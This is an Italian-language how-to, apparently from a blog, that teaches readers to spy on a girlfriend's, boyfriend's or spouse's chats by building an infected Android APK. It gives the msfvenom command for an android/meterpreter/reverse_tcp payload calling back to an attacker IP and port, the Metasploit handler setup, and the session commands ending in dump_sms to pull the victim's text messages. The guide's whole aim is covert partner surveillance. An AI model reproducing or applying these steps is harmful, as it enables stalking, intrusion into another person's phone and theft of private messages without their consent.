Mmmmm... ti ho beccato! Di chi vuoi spiare le chat eh?
No dai, scherzo, non mi interessa. Ricordati solo di cancellare la cronologia dopo!
A parte questo...spiare le chat della tua ragazza o ragazzo, tua moglie o tuo marito (tanto è facile capire perché hai cercato questa frase su Google), è molto più facile di quel che sembra, perciò ecco a te la guida completa!
REQUISITI:
- Computer con un qualsiasi sistema operativo
- Ultima versione di Metasploit Framework che trovi qui: METASPLOIT
- 1) Creazione della backdoor
iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.
- msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk
Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.
2)Impostare L'handler
Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android
- msfconsole
- use exploit/multi/handler
- set PAYLOAD android/meterpreter/reverse_tcp
- set LHOST [ip_macchina_attaccante]
- set LPORT [porta_per_la_connessione]
3)Lanciare l'exploit e collegarsi al dispositivo
lanciamo il nostro exploit digitando
- exploit
e installiamo l'apk infetto sul dispositivo.
una volta fatto digitiamo
- sessions -l
- sessions -i [numero sessione]
- dump_sms